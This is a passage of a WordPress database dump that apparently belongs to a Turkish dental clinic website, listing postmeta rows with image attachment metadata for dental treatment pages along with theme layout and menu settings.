(3279, 6282, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3280, 6283, '_wp_attached_file', '2018/07/cocuklarda-dis-bakimi.jpg'),
(3281, 6283, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:33:\"2018/07/cocuklarda-dis-bakimi.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"cocuklarda-dis-bakimi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"cocuklarda-dis-bakimi-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:33:\"cocuklarda-dis-bakimi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:33:\"cocuklarda-dis-bakimi-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:33:\"cocuklarda-dis-bakimi-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:33:\"cocuklarda-dis-bakimi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3282, 6282, '_edit_last', '1'),
(3283, 6282, '_edit_lock', '1531479127:1'),
(3284, 6282, '_thumbnail_id', '6283'),
(3286, 6282, 'slide_template', 'default'),
(3287, 6282, '_wpb_vc_js_status', 'true'),
(3288, 6282, 'us_post_preview_layout', ''),
(3289, 6282, 'us_header', ''),
(3290, 6282, 'us_header_id', ''),
(3291, 6282, 'us_header_sticky_override', '0'),
(3292, 6282, 'us_header_transparent_override', '0'),
(3293, 6282, 'us_header_shadow', '0'),
(3294, 6282, 'us_header_sticky_pos', ''),
(3295, 6282, 'us_titlebar', ''),
(3296, 6282, 'us_titlebar_subtitle', ''),
(3297, 6282, 'us_titlebar_size', ''),
(3298, 6282, 'us_titlebar_color', ''),
(3299, 6282, 'us_titlebar_breadcrumbs', ''),
(3300, 6282, 'us_titlebar_image', ''),
(3301, 6282, 'us_titlebar_bg_size', ''),
(3302, 6282, 'us_titlebar_bg_repeat', ''),
(3303, 6282, 'us_titlebar_bg_position', ''),
(3304, 6282, 'us_titlebar_bg_parallax', ''),
(3305, 6282, 'us_titlebar_overlay_color', ''),
(3306, 6282, 'us_sidebar', ''),
(3307, 6282, 'us_sidebar_id', 'default_sidebar'),
(3308, 6282, 'us_sidebar_pos', 'right'),
(3309, 6282, 'us_footer', ''),
(3310, 6282, 'us_footer_id', 'default-footer'),
(3311, 6285, 'us_og_image', ''),
(3312, 6285, 'us_grid_layout_ids', ''),
(3313, 6285, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3314, 6286, '_wp_attached_file', '2018/07/kanser-hastalari-agiz-ve-dis-sagligi.jpg');
INSERT INTO `zdenl_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(3315, 6286, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:48:\"2018/07/kanser-hastalari-agiz-ve-dis-sagligi.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"kanser-hastalari-agiz-ve-dis-sagligi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"kanser-hastalari-agiz-ve-dis-sagligi-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:48:\"kanser-hastalari-agiz-ve-dis-sagligi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:48:\"kanser-hastalari-agiz-ve-dis-sagligi-600x534.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:48:\"kanser-hastalari-agiz-ve-dis-sagligi-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:48:\"kanser-hastalari-agiz-ve-dis-sagligi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3316, 6285, '_edit_last', '1'),
(3317, 6285, '_edit_lock', '1531935693:1'),
(3318, 6285, '_thumbnail_id', '6286'),
(3320, 6285, 'slide_template', 'default'),
(3321, 6285, '_wpb_vc_js_status', 'true'),
(3322, 6285, 'us_post_preview_layout', ''),
(3323, 6285, 'us_header', ''),
(3324, 6285, 'us_header_id', ''),
(3325, 6285, 'us_header_sticky_override', '0'),
(3326, 6285, 'us_header_transparent_override', '0'),
(3327, 6285, 'us_header_shadow', '0'),
(3328, 6285, 'us_header_sticky_pos', ''),
(3329, 6285, 'us_titlebar', ''),
(3330, 6285, 'us_titlebar_subtitle', ''),
(3331, 6285, 'us_titlebar_size', ''),
(3332, 6285, 'us_titlebar_color', ''),
(3333, 6285, 'us_titlebar_breadcrumbs', ''),
(3334, 6285, 'us_titlebar_image', ''),
(3335, 6285, 'us_titlebar_bg_size', ''),
(3336, 6285, 'us_titlebar_bg_repeat', ''),
(3337, 6285, 'us_titlebar_bg_position', ''),
(3338, 6285, 'us_titlebar_bg_parallax', ''),
(3339, 6285, 'us_titlebar_overlay_color', ''),
(3340, 6285, 'us_sidebar', ''),
(3341, 6285, 'us_sidebar_id', 'default_sidebar'),
(3342, 6285, 'us_sidebar_pos', 'right'),
(3343, 6285, 'us_footer', ''),
(3344, 6285, 'us_footer_id', 'site-footer'),
(3348, 6290, 'us_og_image', 'http://www.ze-dent.com/wp-content/uploads/2018/07/logo2.jpg'),
(3349, 6290, 'us_grid_layout_ids', ''),
(3350, 6290, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3351, 6290, '_edit_last', '1'),
(3352, 6290, '_edit_lock', '1532344549:1'),
(3353, 6291, '_wp_attached_file', '2018/07/logo1.jpg'),
(3354, 6291, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:294;s:4:\"file\";s:17:\"2018/07/logo1.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"logo1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"logo1-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:17:\"logo1-350x294.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:17:\"logo1-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:17:\"logo1-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:17:\"logo1-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3355, 6292, '_wp_attached_file', '2018/07/logo2.jpg'),
(3356, 6292, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:293;s:4:\"file\";s:17:\"2018/07/logo2.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"logo2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"logo2-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:17:\"logo2-350x293.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:17:\"logo2-600x293.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:17:\"logo2-600x293.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:17:\"logo2-600x293.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3357, 6293, '_wp_attached_file', '2018/07/logo3.jpg'),
(3358, 6293, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:294;s:4:\"file\";s:17:\"2018/07/logo3.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"logo3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"logo3-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:17:\"logo3-350x294.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:17:\"logo3-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:17:\"logo3-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:17:\"logo3-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3359, 6294, '_wp_attached_file', '2018/07/logo4.jpg'),
(3360, 6294, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:294;s:4:\"file\";s:17:\"2018/07/logo4.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"logo4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"logo4-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:17:\"logo4-350x294.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:17:\"logo4-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:17:\"logo4-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:17:\"logo4-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3361, 6295, '_wp_attached_file', '2018/07/logo-5.jpg'),
(3362, 6295, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:293;s:4:\"file\";s:18:\"2018/07/logo-5.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"logo-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"logo-5-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:18:\"logo-5-350x293.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:18:\"logo-5-600x293.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:18:\"logo-5-600x293.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:18:\"logo-5-600x293.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3363, 6290, '_wp_page_template', 'default'),
(3364, 6290, 'slide_template', 'default'),
(3365, 6290, '_wpb_vc_js_status', 'true'),
(3366, 6290, 'us_header', ''),
(3367, 6290, 'us_header_id', ''),
(3368, 6290, 'us_header_sticky_override', '0'),
(3369, 6290, 'us_header_transparent_override', '0'),
(3370, 6290, 'us_header_shadow', '0'),
(3371, 6290, 'us_header_sticky_pos', ''),
(3372, 6290, 'us_titlebar', ''),
(3373, 6290, 'us_titlebar_subtitle', ''),
(3374, 6290, 'us_titlebar_size', ''),
(3375, 6290, 'us_titlebar_color', ''),
(3376, 6290, 'us_titlebar_breadcrumbs', ''),
(3377, 6290, 'us_titlebar_image', ''),
(3378, 6290, 'us_titlebar_bg_size', ''),
(3379, 6290, 'us_titlebar_bg_repeat', ''),
(3380, 6290, 'us_titlebar_bg_position', ''),
(3381, 6290, 'us_titlebar_bg_parallax', ''),
(3382, 6290, 'us_titlebar_overlay_color', ''),
(3383, 6290, 'us_sidebar', ''),
(3384, 6290, 'us_sidebar_id', 'default_sidebar'),
(3385, 6290, 'us_sidebar_pos', 'right'),
(3386, 6290, 'us_footer', ''),
(3387, 6290, 'us_footer_id', 'site-footer'),
(3388, 6297, 'us_og_image', ''),
(3389, 6297, 'us_grid_layout_ids', ''),
(3390, 6297, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3391, 6297, '_menu_item_type', 'post_type'),
(3392, 6297, '_menu_item_menu_item_parent', '0'),
(3393, 6297, '_menu_item_object_id', '6290'),
(3394, 6297, '_menu_item_object', 'page'),
(3395, 6297, '_menu_item_target', ''),
(3396, 6297, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3397, 6297, '_menu_item_xfn', ''),
(3398, 6297, '_menu_item_url', ''),
(3400, 6298, 'us_og_image', ''),
(3401, 6298, 'us_grid_layout_ids', ''),
(3402, 6298, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3403, 6298, '_edit_last', '1'),
(3404, 6298, '_edit_lock', '1531491653:1'),
(3405, 6299, '_wp_attached_file', '2018/07/Kanal-Tedavisi-Endodontil.jpg'),
(3406, 6299, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:320;s:4:\"file\";s:37:\"2018/07/Kanal-Tedavisi-Endodontil.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"Kanal-Tedavisi-Endodontil-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Kanal-Tedavisi-Endodontil-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:37:\"Kanal-Tedavisi-Endodontil-350x320.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:37:\"Kanal-Tedavisi-Endodontil-600x320.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:37:\"Kanal-Tedavisi-Endodontil-600x240.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:37:\"Kanal-Tedavisi-Endodontil-600x320.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3407, 6298, 'slide_template', 'default'),
(3408, 6298, '_wpb_vc_js_status', 'true'),
(3409, 6298, 'us_header', ''),
(3410, 6298, 'us_header_id', ''),
(3411, 6298, 'us_header_sticky_override', '0'),
(3412, 6298, 'us_header_transparent_override', '0'),
(3413, 6298, 'us_header_shadow', '0'),
(3414, 6298, 'us_header_sticky_pos', ''),
(3415, 6298, 'us_titlebar', ''),
(3416, 6298, 'us_titlebar_subtitle', ''),
(3417, 6298, 'us_titlebar_size', ''),
(3418, 6298, 'us_titlebar_color', ''),
(3419, 6298, 'us_titlebar_breadcrumbs', ''),
(3420, 6298, 'us_titlebar_image', ''),
(3421, 6298, 'us_titlebar_bg_size', ''),
(3422, 6298, 'us_titlebar_bg_repeat', ''),
(3423, 6298, 'us_titlebar_bg_position', ''),
(3424, 6298, 'us_titlebar_bg_parallax', ''),
(3425, 6298, 'us_titlebar_overlay_color', ''),
(3426, 6298, 'us_sidebar', ''),
(3427, 6298, 'us_sidebar_id', 'default_sidebar'),
(3428, 6298, 'us_sidebar_pos', 'right'),
(3429, 6298, 'us_footer', ''),
(3430, 6298, 'us_footer_id', 'default-footer'),
(3431, 6298, 'us_tile_bg_color', ''),
(3432, 6298, 'us_tile_text_color', ''),
(3433, 6298, 'us_tile_size', '1x1'),
(3434, 6298, 'us_tile_link', '{\"url\":\"\",\"target\":\"\"}'),
(3435, 6298, 'us_tile_additional_image', ''),
(3436, 6302, '_wp_attached_file', '2018/07/kanal-tedavi.jpg'),
(3437, 6302, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2018/07/kanal-tedavi.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"kanal-tedavi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"kanal-tedavi-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:24:\"kanal-tedavi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:24:\"kanal-tedavi-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:24:\"kanal-tedavi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3438, 6298, '_thumbnail_id', '6302'),
(3484, 6318, 'us_og_image', ''),
(3485, 6318, 'us_grid_layout_ids', ''),
(3486, 6318, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3487, 6318, '_menu_item_type', 'post_type'),
(3488, 6318, '_menu_item_menu_item_parent', '6156'),
(3489, 6318, '_menu_item_object_id', '6298'),
(3490, 6318, '_menu_item_object', 'us_portfolio'),
(3491, 6318, '_menu_item_target', ''),
(3492, 6318, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3493, 6318, '_menu_item_xfn', ''),
(3494, 6318, '_menu_item_url', ''),
(3496, 6319, 'us_og_image', ''),
(3497, 6319, 'us_grid_layout_ids', ''),
(3498, 6319, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3499, 6319, '_menu_item_type', 'custom'),
(3500, 6319, '_menu_item_menu_item_parent', '6156'),
(3501, 6319, '_menu_item_object_id', '6319'),
(3502, 6319, '_menu_item_object', 'custom'),
(3503, 6319, '_menu_item_target', ''),
(3504, 6319, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3505, 6319, '_menu_item_xfn', ''),
(3506, 6319, '_menu_item_url', '#'),
(3508, 6320, 'us_og_image', ''),
(3509, 6320, 'us_grid_layout_ids', ''),
(3510, 6320, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3511, 6320, '_menu_item_type', 'custom'),
(3512, 6320, '_menu_item_menu_item_parent', '6156'),
(3513, 6320, '_menu_item_object_id', '6320'),
(3514, 6320, '_menu_item_object', 'custom'),
(3515, 6320, '_menu_item_target', ''),
(3516, 6320, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3517, 6320, '_menu_item_xfn', ''),
(3518, 6320, '_menu_item_url', '#'),
(3520, 6321, 'us_og_image', ''),
(3521, 6321, 'us_grid_layout_ids', ''),
(3522, 6321, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3523, 6321, '_menu_item_type', 'custom'),
(3524, 6321, '_menu_item_menu_item_parent', '6156'),
(3525, 6321, '_menu_item_object_id', '6321'),
(3526, 6321, '_menu_item_object', 'custom'),
(3527, 6321, '_menu_item_target', ''),
(3528, 6321, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3529, 6321, '_menu_item_xfn', ''),
(3530, 6321, '_menu_item_url', '#'),
(3532, 6322, 'us_og_image', ''),
(3533, 6322, 'us_grid_layout_ids', ''),
(3534, 6322, '_vc_post_settings', 'a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(3535, 6322, '_edit_last', '1'),
(3536, 6322, '_edit_lock', '1531493582:1'),
(3537, 6323, '_wp_attached_file', '2018/07/lazer-tedavi.jpg'),
(3538, 6323, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2018/07/lazer-tedavi.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"lazer-tedavi-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"lazer-tedavi-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:24:\"lazer-tedavi-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:24:\"lazer-tedavi-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:24:\"lazer-tedavi-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywor